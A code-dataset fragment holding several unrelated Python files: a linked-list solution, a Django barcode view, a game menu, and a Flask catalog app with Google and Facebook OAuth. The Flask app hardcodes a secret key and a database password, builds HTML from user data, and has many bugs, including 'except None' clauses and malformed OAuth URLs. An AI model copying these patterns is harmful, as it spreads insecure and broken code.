dummy.next = head\n def findMedian(self, head):\n slow, fast = head, head.next\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n return slow\n def reverse(self, head):\n pre = None\n while head:\n tmp = head.next\n head.next = pre\n pre = head\n head = tmp\n return pre\n","sub_path":"Reorder_List/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"208888219","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpRequest\nfrom .models import *\nfrom django.views.decorators.csrf import csrf_exempt\nimport barcode\nfrom barcode.writer import ImageWriter\nfrom barcode import Code128\nfrom pyzbar.pyzbar import decode\nfrom PIL import Image\nfrom pdf417 import encode, render_image, render_svg\n\n# Create your views here.\n\n\ndef showlist(request):\n if request.method == \"POST\":\n brand = request.POST['brand']\n category = request.POST['category']\n model = request.POST['model']\n type = request.POST['type']\n size = request.POST['size'] \n b_id = '00' + brand\n b = (b_id[-2:])\n print(b)\n c_id = '000' + category\n c = (c_id[-3:])\n print(c)\n m_id = '00' + model\n m = (m_id[-2:])\n print(m)\n t_id = '000' + type\n t = (t_id[-3:])\n print(t)\n s_id = '000' + size\n s = (s_id[-2:])\n print(s)\n out = b + c + m + t + s \n \"\"\" print(out) \"\"\"\n \"\"\" a = barcode.get_barcode_class('code128')\n b = a(out, writer=ImageWriter())\n c = b.save('filename') \"\"\"\n EAN = barcode.get_barcode_class('ean13')\n ean = EAN(f'{b}{c}{m}{t}{s}', writer=ImageWriter())\n d = ean.save('bar')\n\n img = Image.open('bar.png')\n result = decode(img)\n for i in result:\n num = []\n print(i.data.decode(\"utf-8\"))\n num.append(i.data.decode(\"utf-8\"))\n\n string = (num[0])\n print(string)\n brand_match = int(string[0:2])\n category_match = int(string[2:5])\n model_match = int(string[5:7])\n type_match = int(string[7:10])\n size_match = int(string[10:12])\n print(brand_match)\n print(category_match)\n print(model_match)\n print(type_match)\n print(size_match) \n br = Brand.objects.get(pk=brand_match)\n print(br.brand)\n ca = Category.objects.get(pk=category_match)\n print(ca.category)\n mo = Model.objects.get(pk=model_match)\n print(mo.model)\n ty = Type.objects.get(pk=type_match)\n print(ty.type)\n si = Size.objects.get(pk=size_match)\n print(si.size)\n\n \n \"\"\" buffer = BytesIO()\n ean.write(buffer)\n self.barcode.save('bar.png', File(buffer), save=False) \"\"\"\n return redirect('showlist')\n return render(request, 'templates/home.html')\n return brand, category, model, type, size\n \n results = Brand.objects.all()\n category = Category.objects.all()\n model = Model.objects.all()\n type = Type.objects.all()\n size = Size.objects.all()\n context = {'results':results, 'category':category, 'model':model, 'type':type, 'size':size}\n return render(request, 'templates/home.html', context)\n\n \"\"\" def readlist(request):\n img = Image.open('barcode.png'\n result = decode(img)\n print(result)\n for i in result:\n print(i.data.decode(\"utf-8\")) \"\"\"\n \n \"\"\" s1 = 0\n s2 = 10\n\n def createlist(s1, s2):\n return [item for item in range(s1, s2)]\n results = ((createlist(s1, s2)))\n results = [str(i) for i in results]\n for item in results:\n codes = encode(str(item), columns=3, security_level=2)\n image = render_image(codes, scale=5, ratio=2, padding=5, fg_color=\"Indigo\", bg_color=\"#ddd\") # Pillow Image object\n image.save('barcode.jpg') \"\"\"\n\n ","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"176417250","text":"import sys\nfrom art import text2art as ascii\nfrom metroid_utils import *\nfrom metroid_config import *\nfrom data.objects import *\nfrom data.battle import *\n\ntype(ascii(\"METROID\"),textspeed_menu_art)\n\ntype('1. New Game',textspeed_menu)\ntype('2. Load Game',textspeed_menu)\n\ntype(\"Press the corresponding key for an option, then hit enter to confirm.\",textspeed_menu)\n\nmenuoption = input(\"> \").upper()\nprint()\n\nif menuoption == '1':\n type(\"Starting New Game...\", textspeed_menu)\n Samus = Player()\n while True:\n encounter(Samus)\n input(\"> \")\n print()\nelif menuoption == '2':\n type(\"Locate the path of your save file.\", textspeed_menu)\nelse:\n type(\"Quitting...\", textspeed_menu)\n sys.exit()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"294835335","text":"#!/usr/bin/env python3\n\nimport os\n\nfrom flask import Flask\nfrom flask import render_template, request, redirect, jsonify, url_for, flash\n# File upload import here\nfrom flask import send_from_directory\nfrom werkzeug.utils import secure_filename\nfrom datafrica.file_organizer import allowed_file, delete_image\nfrom sqlalchemy.orm.exc import NoResultFound\n\n# Add database imports here\nfrom sqlalchemy import create_engine, asc, desc, literal, func\nfrom sqlalchemy.orm import sessionmaker\nfrom datafrica.database_setup import Base, Category, Item, User\n\n# NEW IMPORTS FOR THIS STEP\nfrom flask import session as login_session\n# As keyword b/c we already used the variable session\n# in my database sqlalchemy.\n\n# NEW IMPORTS FOR THIS STEP\nfrom flask import session as login_session\n# As keyword b/c we already used the variable session my database sqlalchemy.\nimport random\nimport string\n\n# IMPORTS FOR THIS STEP (oauth server side)\nfrom oauth2client import client\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport json\nfrom flask import make_response\nimport requests\n\nUPLOAD_FOLDER = '/var/www/datafrica/datafrica/uploads'\nALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'gif'}\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n# DECLARE MY CLIENT ID BY REFERENCING THE CLIENT SECRETS FILE\nAPP_PATH = '/var/www/datafrica/datafrica/'\nclient_id = json.loads(\n open(APP_PATH + 'client_secrets.json', 'r').read())['web']['client_id']\n\nAPPLICATION_NAME = \"Catalog App\"\n\n# Make an instance of create engine\n# engine = create_engine ('sqlite:///catalog.db')\nengine = create_engine('postgresql://datafrica:password@localhost/datafrica')\n# Bind the engine to the metadata of the Base class\n# To establish conversation with the database and act as staging zone\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\n\n# Create DB session instance\nsession = DBSession()\n\n@app.route('/')\n@app.route('/index')\ndef showIndex():\n return render_template(\"index.html\")\n\n\n# Create ant-forgery state token\n@app.route('/login')\ndef showLogin():\n # This method creates a unique session token.This token is sent along side\n # the one-time code sent by google via GET request sent to\n # localhost:8000/login.\n state = ''.join(random.choice(string.ascii_uppercase + string.digits)\n for x in range(32))\n # state is a random mixed 32 character long string.\n # Store state from our login_session(a dict)\n # in a variable state.\n login_session['state'] = state\n # return \"The current session state is %s\" %login_session['state']\n # to see what are current state look like. STATE is sent back with oauth.\n return render_template('login.html', STATE=state)\n\n# HANDLER OF CODE SENT BACK FROM CALLBACK METHOD - one time code from google\n@app.route('/gconnect', methods=['GET', 'POST'])\ndef gconnect():\n # Call request args get for my code to examine the state\n # token passed in and compares it to the state of the login session.\n if request.args.get('state') != login_session['state']:\n # If there is mismatch\n response = make_response(json.dumps('invalid state token'), 401)\n response.headers['content-Type'] = 'application/json'\n return response\n # If there is a match\n # Obtain authorization code from my server with request data function\n # Request is variable that holds data and information about code\n code = request.data\n\n try:\n # Upgrade the authorization code into a credentials object\n oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n # Access all credentials including access code.\n credentials = oauth_flow.step2_exchange(code)\n # retreive only the access token in json format.\n access_token = credentials.access_token\n # If an error happen along the way\n except FlowExchangeError:\n response = make_response(json.dumps(\n 'Failed to upgrade the authorization code.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Append this token to the following url\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo\\\n ?access_token = %s' % access_token)\n # Create a json GET request with these two lines,\n # containing the url and access_token\n h = httplib2.Http()\n result = json.loads((h.request(url, 'GET')[1]).decode('utf-8'))\n\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is used for the intended user.\n # Only the it_token part is extracted from credential object.\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(\n json.dumps(\"Token's user ID doesn't match given user ID.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is valid for this app.\n if result['issued_to'] != client_id:\n response = make_response(\n json.dumps(\"token's client ID does not match the app's.\"), 401\n )\n print(\"Token's client ID does not match app's.\")\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Check to see if the user is already logged in\n stored_access_token = login_session.get('access_token')\n stored_gplus_id = login_session.get('gplus_id')\n if stored_access_token is not None and gplus_id == stored_gplus_id:\n response = make_response(json.dumps(\n 'Current user is already connected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Store the access token in the session for later use.\n login_session['access_token'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n\n # Get user info\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n\n data = answer.json()\n\n login_session['username'] = data['name']\n login_session['picture'] = data['picture']\n login_session['email'] = data['email']\n\n # see if user exists, if it doesn't make a new one.\n # Get user id on the email address stored in our log-in session\n # stored in the variable user_id.\n user_id = getUserID(login_session['email'])\n if not user_id:\n user_id = createUser(login_session)\n login_session['user_id'] = user_id\n\n output = ''\n output += '<h1>Welcome, '\n output += login_session['username']\n output += '!</h1>'\n output += '<img src=\"'\n output += login_session['picture']\n output += ' \" style = \"width: 300px; height: 300px;\\\n border-radius: 150px;-webkit-border-radius: \\\n 150px;-moz-border-radius: 150px;\"> '\n flash(\"you are now logged in as %s\" % login_session['username'])\n print(\"done!\")\n return output\n\n# DISCONNECT - Revoke a current user's token and reset their login_session\n@app.route('/gdisconnect')\ndef gdisconnect():\n \"\"\"This method revokes a current user's token\"\"\"\n\n access_token = login_session.get('access_token')\n if access_token is None:\n print('Access Token is None')\n response = make_response(json.dumps(\n 'Current user not connected.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n print('In gdisconnect access token is %s'), access_token\n print('User name is: ')\n print(login_session['username'])\n url = ('https://accounts.google.com/o/oauth2\\\n /revoke?token = %s' % login_session['access_token'])\n h = httplib2.Http()\n result = h.request(url, 'GET')[0]\n print('result is ')\n print(result)\n if result['status'] == '200':\n del login_session['access_token']\n del login_session['gplus_id']\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n response = make_response(json.dumps('Successfully disconnected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n else:\n response = make_response(json.dumps(\n 'Failed to revoke token for given user.', 400))\n response.headers['Content-Type'] = 'application/json'\n return response\n\n\n# FACEBOOK SIGN IN\n@app.route('/fbconnect', methods=['GET', 'POST'])\ndef fbconnect():\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n access_token = request.data\n print(\"access token received %s \") % access_token\n # Below, exchange the short-lived token for a long-lived server side token\n # with GET /oauth/access_token?grant_type=fb_exchange_token&client_id=\n # {app-id}&client_secret={app-secret}&fb_exchange_token={short-lived-token}\n app_id = json.loads(open('fb_client_secrets.json', 'r').read())[\n 'web']['app_id']\n # send my app secret to Facebook to verify my identity.\n app_secret = json.loads(\n open('fb_client_secrets.json', 'r').read())['web']['app_secret']\n url = 'https://graph.facebook.com/v5.0/oauth\\\n /access_token?grant_type=fb_exchange_token&\\\n client_id = %s&client_secret = %s&fb_exchange_token = %s'\\\n % (app_id, app_secret, access_token)\n h = httplib2.Http()\n result = h.request(url, 'GET')[1]\n # Use token to get user info from API\n userinfo_url = \"https://graph.facebook.com/v5.0/me\"\n '''\n Due to the formatting for the result from the server token\n exchange we have to split the token first on commas\n and select the first index which gives us the key :\n value for the server access token then we split it\n on colons to pull out the actual token value\n and replace the remaining quotes with nothing so\n that it can be used directly in the graph api calls\n '''\n token = result.split(',')[0].split(':')[1].replace('\"', '')\n\n url = 'https://graph.facebook.com/\\\n v5.0/me?access_token=%s&fields=id,name,email' % token\n\n h = httplib2.Http()\n result = h.request(url, 'GET')[1]\n # print \"url sent for API access:%s\"% url\n # print \"API JSON result: %s\" % result\n data = json.loads(result)\n login_session['provider'] = 'facebook'\n login_session['username'] = data[\"name\"]\n login_session['email'] = data[\"email\"]\n login_session['facebook_id'] = data[\"id\"]\n\n # The token must be stored in the login_session in order to properly logout\n login_session['access_token'] = token\n\n # Get user picture\n url = 'https://graph.facebook.com/v2.8/\\\n me/picture?access_token = %s&redirect = 0\\\n &height = 200&width = 200' % token\n h = httplib2.Http()\n result = h.request(url, 'GET')[1]\n data = json.loads(result)\n\n login_session['picture'] = data[\"data\"][\"url\"]\n\n # see if user exists\n user_id = getUserID(login_session['email'])\n if not user_id:\n user_id = createUser(login_session)\n login_session['user_id'] = user_id\n\n # Welcome splash screen\n output = ''\n output += '<h1>Welcome, '\n output += login_session['username']\n\n output += '!</h1>'\n output += '<img src=\"'\n output += login_session['picture']\n output += ' \" style = \"width: 300px; height: \\\n 300px;border-radius: 150px;-webkit-border-radius: \\\n 150px;-moz-border-radius: 150px;\"> '\n\n flash(\"Now logged in as %s\" % login_session['username'])\n return output\n\n\n@app.route('/fbdisconnect')\ndef fbdisconnect():\n facebook_id = login_session['facebook_id']\n # The access token must me included to successfully logout\n access_token = login_session['access_token']\n url = 'https://graph.facebook.com/%s\\\n /permissions?access_token = %s' % (facebook_id, access_token)\n h = httplib2.Http()\n result = h.request(url, 'DELETE')[1]\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n del login_session['user_id']\n del login_session['facebook_id']\n return \"you have been logged out\"\n\n#####\n# LOCAL PERMISSION SYSTEM\n# User Helper Functions\n# Local permission system, leverages the information\n# stored in the log in session object, and uses the server side logic\n# in the datatbase to control the user experience based on\n# provided credential. To implement LPS, our database has\n# to start storing information in a more user specifci manner.\n# We need a table of users, so we can identify what data belongs to whom.\n# This step include work on lotsofitems as well.\n\n\n# createUser takes in login_session as input\ndef createUser(login_session):\n \"\"\"create new user in our database, extracting all\n the fields neccessary to populate it from information\n gathered from the login_session\"\"\"\n\n newUser = User(\n name=login_session['username'],\n email=login_session['email'],\n picture=login_session['picture'])\n session.add(newUser)\n session.commit()\n user = session.query(User).filter_by(email=login_session['email']).one()\n # Then returns a user_id of the new user created\n return user.id\n\n\ndef getUserInfo(user_id):\n \"\"\"If a user ID is passed into this method,\n it simply returns the user object associated with this ID number.\"\"\"\n\n user = session.query(User).filter_by(id=user_id).one()\n # Returns user object associated with this number.\n return user\n\n\ndef getUserID(email):\n \"\"\"This method, takes an email address and return and ID,\n if that email address belongs to user stored in our database\"\"\"\n\n try:\n user = session.query(User).filter_by(email=email).one()\n # Returns an ID number if the email address belongs to\n # a user stored in our database.\n return user.id\n except None:\n # If not, it returns None.\n return None\n\n# END OF LOCAL PERMISSION\n\n\n# JSON APIs to view Catalog Information\n@app.route('/catalog/json')\ndef catalogJSON():\n categories = session.query(Category).all()\n return jsonify(Category=[i.serialize for i in categories])\n\n\n@app.route('/catalog/items/json')\ndef itemsJSON():\n Items = session.query(Item).all()\n return jsonify(Items=[i.serialize for i in items])\n\n\n@app.route('/catalog/<category_name>/<int:category_id>/<item_title>\\\n/<int:item_id>/json')\ndef productItemJSON(category_name, item_title):\n Product_Item = session.query(Item).filter_by(\n title=item_title).one_or_none()\n return jsonify(Product_Item=Product_Item.serialize)\n\n\n\n# Show all Categories and latest Item-list associated with them\n@app.route('/catalog/')\ndef showCatalog():\n # Add SQLAlchemy statements\n \"\"\"Show the index page displaying the categories and\n latest items 20 items added to the database.\n \"\"\"\n # To protect each category or each category or\n # item based on whoever created it.\n categories = session.query(Category).all()\n\n # result[::-1] return the slice of every elelement of result in reverse\n latestItems = session.query(Item).order_by(desc(Item.id))[0:20]\n\n # If there is a username value in the login_session, we would\n # render one template or the other.\n\n # # # If there is a username value in the login_session, we would\n # render one template or the other.\n # If a user isn't logged in or isn't the original creator\n if 'username' not in login_session:\n return render_template('index.html')\n else:\n return render_template(\n 'catalog.html',\n categories=categories,\n latestItems=latestItems,\n # A parameter for conditional login/out\n login_session=login_session)\n\n\n# \"Show item-list associated with a specific category\n@app.route('/catalog/<category_name>/<int:category_id>/items')\ndef showCategory(category_name, category_id):\n # Add SQLAlchemy statements\n \"\"\"Takes in a specified category_name and returns the\n the items associated with it. Renders a web page\n showing all the categories on one side and the items\n on the other side of the page.\n \"\"\"\n # NOTE IMPORTANT!\n # In other to handle cases where requested items does not exist,\n # in the database. As it is, if you access the\n # URL: http://localhost:8000/catalog/Frisbee/10/Joylight/250000/.\n # The .one() method in filter_by will return:\n # sqlalchemy.orm.exc.NoResultFound\n # NoResultFound: No row was found for one ()\n # A better way to do that would be using one_or_none().\n # This function returns an object NoneType if it doesn't\n # exist and then you do a PageNotFound when the object is None.\n try:\n category = session.query(Category).\\\n filter_by(id=category_id).one_or_none()\n except None:\n return PageNotFound\n\n categories = session.query(Category).all()\n items = session.query(Item).filter_by(\n category=category).order_by(asc(Item.title))\n # # return count of item \"id\" grouped by category_id\n categoryItems = session.query(func.count(\n Item.id)).filter_by(\n category_id=category.id).one()\n\n # # If a user isn't logged in or isn't the original creator, we would\n # render one template or the other. # Decide which page to show,\n # index or category.html\n if 'username' not in login_session:\n return redirect('/login')\n else:\n return render_template(\n 'category.html',\n categories=categories,\n category=category,\n items=items,\n categoryItems=categoryItems)\n\n\n# Role required - creator\n@app.route('/catalog/create', methods=['GET', 'POST'])\ndef newCategory():\n \"\"\" Renders a form for input of a new Category - GET request.\n if I get a post -redirect to 'showCatalog' after creating\n new Category info.\n \"\"\"\n # ADD LOGIN PERMISSION\n # If a username is not detected for a given request.\n # Lets redirect to login page.\n if 'username' not in login_session:\n return redirect('/login')\n # Create an if statement that looks for a post request.\n # By calling request method\n if request.method == 'POST':\n # Extract the name field from my form. .get used b/c of bad request key\n newCategory = Category(\n name=request.form['name'],\n user_id=login_session.get('user_id'))\n session.add(newCategory)\n session.commit()\n flash('New Category %s Successfully \\\n Created' % newCategory.name)\n # To redirect my user back to the main page.\n # I can use a helper function\n # Url for takes the name of the function as the first arg,\n # and a number of key args, each corresponding to the variable\n # part of the URL rule.\n return redirect(url_for('showCatalog'))\n else:\n # If my server did not receive a post request, it will go ahead\n # and render the template for the new HTML template that i created.\n return render_template('newcategory.html')\n\n\n# Role required -employee creator\n@app.route('/catalog/<category_name>/<int:category_id>\\\n/edit', methods=['GET', 'POST'])\ndef editACategoryName(category_name, category_id):\n \"\"\"1. First execute a query to find the exact item we want\n to update: Find entry and store it in a variable\n 2. Next Reset values: we declare the new name of\n the variable\n 3. Next we add the variable to our session\n 4. Finally we commit the the session the database\n \"\"\"\n # Execute a query to find the category and store it in\n # a variable editedCategory.\n try:\n categoryToEdit = session.query(Category).\\\n filter_by(id=category_id).one_or_none()\n except None:\n return PageNotFound\n\n # ADD LOGIN PERMISSION\n # Protect app modification from non-users\n # If a username is not detected for a given request.\n # Lets redirect to login page.\n if 'username' not in login_session:\n return redirect('/login')\n # Verify that a user is logged in by\n # checking if the username has a variable filled in\n # If a user isn't logged in \"Alert message\"\n if categoryToEdit.user.id != login_session['user_id']:\n return \"<script>function myFunction() {alert( 'You are not\\\n authorized to edit this category.');}\\\n </script><body onload='myFunction()'>\"\n\n # Create an if statement that looks for a post request.\n # By calling request method\n if request.method == 'POST':\n # Then create an if statement that looks for a name in the form.\n # By calling request form get.\n if request.form['name']:\n # Now reset the name of the category to the new name from the form\n categoryToEdit.name = request.form['name']\n # To edit, you don't need to add it again.\n session.commit()\n flash('Category successfully edited %s' % categoryToEdit.name)\n # Redirect the user back to the home page.\n return redirect(url_for('showCatalog'))\n else:\n return render_template(\n 'editacategoryname.html',\n category=categoryToEdit)\n\n\n# Role required - employee creator\n@app.route('/catalog/<category_name>/<int:category_id>\\\n/delete', methods=['GET', 'POST'])\ndef deleteCategory(category_name, category_id):\n # Execute a query to find the category and store it in a variable.\n try:\n category = session.query(Category).\\\n filter_by(id=category_id).one_or_none()\n except None:\n return PageNotFound\n\n try:\n categoryToDelete = session.query(Category).\\\n filter_by(id=category_id).one_or_none()\n except None:\n return PageNotFound\n creator = getUserInfo(category.user_id)\n\n # ADD LOGIN PERMISSION\n # If a user name is not detected for a given request.\n # Lets redirect to login page.\n if 'username' not in login_session:\n return redirect('/login')\n # To protect each item based on whoever created it.\n # If a user isn't logged in or isn't the original creator\n if categoryToDelete.user.id != login_session['user_id']:\n # The script gives not only an alert that you are not,\n # but also we stay where we are right here.\n return \"<script>function myFunction() {alert('You are not\\\n authorized to delete this category.\\\n Please create your own category in order\\\n to edit categories.');}</script><body onload='myFunction()'>\"\n else:\n render_template('deletecategory.html', category=categoryToDelete,\n creator=creator)\n\n # if not we stay here- render_template('deletecategory.html', category=categoryToDelete)\n\n # Create an if statement that looks for a post request.\n # By calling request method\n if request.method == 'POST':\n session.delete(categoryToDelete)\n session.commit()\n flash('%s Successfully Deleted' % categoryToDelete.name)\n return redirect(url_for('showCatalog'))\n else:\n return render_template('deletecategory.html',\n category = categoryToDelete)\n\n@app.route('/catalog/myitems/')\ndef showUserItems():\n \"\"\"If logged in, show the user the items they have added.\"\"\"\n if 'username' not in login_session:\n return redirect('/login')\n\n user_id = get_user_id(login_session['email'])\n\n categories = session.query(Category).all()\n items = session.query(Item).filter_by(user_id=user_id).all()\n\n if not items:\n flash(\"You haven't add any animals yet.\")\n redirect(url_for('showCatalog'))\n\n return render_template('useritems.html',\n categories=categories,\n items=items)\n\n\n# \"This page is the Item for %s\" % item_id\n@app.route('/catalog/<category_name>/<int:category_id>/<item_title>/<int:item_id>/')\n#@login_required\ndef showItem(category_name, category_id, item_title, item_id):\n # Add SQLAlchemy statements\n \"\"\"Renders product information web page of an item.\n \"\"\"\n try:\n category = session.query(Category).\\\n filter_by(id = category_id).one_or_none()\n\n except None: # If a NoneType object is returned\n return PageNotFound\n\n try:\n item = session.query(Item).filter_by(id = item_id).one_or_none()\n except None: # If a NoneType object is returned\n return PageNotFound\n\n creator = getUserInfo(item.user_id)\n\n # # # If there is a username value in the login_session, we would\n # render one template or the other.\n if 'username' not in login_session:\n return redirect(url_for('/login'))\n # Decide which page should be visible to the public\n # And which one should be private\n else:\n return render_template('item.html',\n category = category,\n item = item,\n creator = creator)\n\n\n# Role required: User- creator\n# \"This page will be for adding a new Item\"\n@app.route('/catalog/new', methods = ['GET', 'POST'])\n#@login_required\ndef newItem():# Add item base on category name.\n \"\"\" Renders a form for input of a new item - GET request. if I get a post -redirect to 'showItem' after creating new item.\n \"\"\"\n # ADD LOGIN PERMISSION\n # Protect app modification from non-users\n # If a username is not detected for a given request.\n # Lets redirect to login page.\n\n if 'username' not in login_session:\n return redirect('/login')\n\n categories = session.query(Category).all()\n\n # Add SQLAlchemy statements\n if request.method == 'POST':\n # This is key to retreiving category from the form.\n try:\n category = (session.query(Category).filter_by(\n name= request.form.get('category')).one_or_none())\n except None:# If a NoneType object is returned\n return PageNotFound\n\n newItem = Item(category = category,\n title = request.form['title'],\n description = request.form['description'],\n price = request.form['price'],\n user_id=login_session['user_id'])\n # access the file from the files dictionary\n # on request object:\n #file = request.files['file']\n\n # Process optional item image.\n image_file =request.files['file']\n if image_file and allowed_file(image_file.filename):\n filename = secure_filename(image_file.filename)\n if os.path.isdir(app.config['UPLOAD_FOLDER']) is False:\n os.mkdir(app.config['UPLOAD_FOLDER'])\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n newItem.image_filename = filename\n elif request.form['basic_url']:\n newItem.basic_url = request.form['basic_url']\n\n session.add(newItem)\n session.commit()\n flash('New Item %s successfully Created' % newItem.title)\n # Now define the url variable path to the newItem created.\n\n creator = getUserInfo(newItem.user_id)\n # Show response to my post request in the client.\n return redirect(url_for('showItem', category_name=category_name,\n category_id=category_id, item_title=item_title, item_id=item_id,\n creator = creator))\n else:\n return render_template('newitem.html', categories = categories)\n\n\n# Role required user- creator\n# \"This page is for editing Item %s\" % item_id\n@app.route('/catalog//<category_name>/<int:category_id>/<item_title>/<int:item_id>/edit', methods = ['GET', 'POST'])\n#@login_required\ndef editItem(category_name, category_id, item_title, item_id):\n \"\"\"Edit the details of the specified item.\n Returns a GET with edititem.html - form with inputs to edit item info\n if I get a post - redirect to 'showCategory' after updating item info.\n \"\"\"\n # ADD LOGIN PERMISSION\n # If a user name is not detected for a given request.\n # Lets redirect to login page.\n if 'username' not in login_session:\n return redirect('/login')\n # Add SQLAlchemy statements\n categories = session.query(Category).all()\n\n try:\n category = session.query(Category).\\\n filter_by(id = category_id).one_or_none()\n except None: # If a NoneType object is returned\n return PageNotFound\n\n try:\n editedItem = session.query(Item).filter_by(\n id = item_id).one_or_none()\n except None:\n # If a NoneType object is returned\n return PageNotFound\n return redirect(url_for('showCatalog'))\n\n # To protect each item based on whoever created it.\n creator = getUserInfo(editedItem.user_id)\n\n\n # ADD ALERT MESSAGE TO PROTECT.\n # If a user isn't logged in or isn't the original creator\n if 'username' not in login_session or creator.id !=login_session['user_id']:\n return \"<script>function myFunction() {alert('You are not authorized to edit this item. Please create your own item in order to edit items.');}</script><body onload='myFunction()'>\"\n\n\n if request.method == 'POST':\n # This is key to retreiving the category from the form.\n category = (session.query(Category).filter_by(\n name= request.form.get('category')).one())\n if request.form['title']:\n editedItem.title = request.form['title']\n if request.form['description']:\n editedItem.description = request.form['description']\n if request.form['price']:\n editedItem.price = request.form['price']\n if request.files['file']:\n editedItem.image_filename = request.files['file']\n\n # Process optional item image\n image_file = request.files['file']\n if image_file and allowed_file(image_file.filename):\n if editedItem.image_filename:\n delete_image(editedItem.image_filename)\n filename = secure_filename(image_file.filename)\n if os.path.isdir(app.config['UPLOAD_FOLDER']) is False:\n os.mkdir(app.config['UPLOAD_FOLDER'])\n image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n editedItem.image_filename = filename\n editedItem.basic_url = None\n\n elif ('delete_image' in request.form and\n request.form['delete_image'] == 'delete'):\n if editedItem.image_filename:\n delete_image(editedItem.image_filename)\n\n if not image_file and request.form['basic_url']:\n editedItem.basic_url = request.form['basic_url']\n if editedItem.image_filename:\n delete_image(editedItem.image_filename)\n\n\n session.add(editedItem)\n session.commit()\n flash('Item Successfully Edited')\n return redirect(url_for('showCategory', category_name=category_name,\n category_id = category_id))\n else:\n return render_template('edititem.html', category = category,\n categories = categories,\n item = editedItem)\n\n# Role required: User creator\n# \"This page is for deleting Item %s\" %item_id\n@app.route('/catalog/<category_name>/<int:category_id>/<item_title>/<int:item_id>/delete', methods = ['GET', 'POST'])\n#@login_required\ndef deleteItem(category_name, category_id, item_title, item_id):\n # Add SQLAlchemy statements\n \"\"\"Delete a specified item from the database.\n Returns:\n GET: deleteitem.html - form for confirmation prior to deletion of item.\n POST: if I get a post -redirect to 'showCategory' after item info deletion.\n \"\"\"\n # ADD LOGIN PERMISSION\n # If a user name is not detected for a given request.\n # Lets redirect to login page.\n if 'username' not in login_session:\n return redirect('/login')\n # filter_by uses the names of the columns in a table\n try:\n category = session.query(Category).\\\n filter_by(id = category_id).one_or_none()\n except None: # If a NoneType object is returned\n return PageNotFound\n\n try:\n itemToDelete = session.query(Item).filter_by(\n id =item_id).one_or_none()\n except None: # If a NoneType object is returned\n return PageNotFound\n\n creator = getUserInfo(itemToDelete.user_id)\n # ADD ALERT MESSAGE TO PROTECT.\n # If a user isn't logged in or isn't the original creator\n if 'username' not in login_session or creator.id !=login_session['user_id']:\n return \"<script>function myFunction() {alert('You are not authorized to edit this item. Please create your own item in order to edit items.');}</script><body onload='myFunction()'>\"\n if request.method == 'POST':\n session.delete(itemToDelete)\n session.commit()\n flash('Item Successfully Deleted')\n return redirect(url_for('showCategory',\n category_name = category_name,\n category_id =category_id))\n else:\n return render_template('deleteitem.html', category = category,\n item = itemToDelete)\n\n\n@app.route('/logout')\n#@login_required\ndef disconnect():\n \"\"\"Checks if the provider has been set in login_session\"\"\"\n\n if 'provider' in login_session:\n if login_session['provider'] == 'google':\n gdisconnect()\n del login_session['gplus_id']\n del login_session['access_token']\n if login_session['provider'] == 'facebook':\n fbdisconnect()\n del login_session['facebook_id']\n del login_session['username']\n del login_session['email']\n del login_session['picture']\n del login_session['user_id']\n del login_session['provider']\n flash(\"You have successfully been logged out.\")\n return redirect(url_for('showCatalog'))\n else:\n flash(\"You were not logged in\")\n return redirect(url_for('showCatalog'))\n\n\n@app.route('/item_images/<filename>')\ndef show_item_image(filename):\n \"\"\"Route to serve user uploaded images.\n Args:\n filename (str): Filename of the image to serve to the client.\n \"\"\"\n return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key'\n # app.debug = True\n # app.run(ssl_context='adhoc')\n # app.run(threaded=False)\n app.config['UPLOAD_FOLDER']= True\n app.run(host = '0.0.0.0', port = 8000)\n\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":35329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"269815030","text":"#coding=utf-8\n\nimport unittest\nfrom util.tree_node import TreeNode\n\n\"\"\"\nFlatten a binary tree to a fake \"linked list\" in pre-order traversal.\n\nHere we use the right pointer in TreeNode as the next pointer in ListNode.\n\n Notice\n\nDon't forget to mark the left child of each node to null. Or you will get Time Limit Exceeded or Memory Limit Exceeded.\n\nHave you met this question in a real interview? Yes\nExample\n 1\n \\\n 1 2\n / \\ \\\n 2 5 => 3\n / \\ \\ \\\n 3 4 6 4\n \\\n 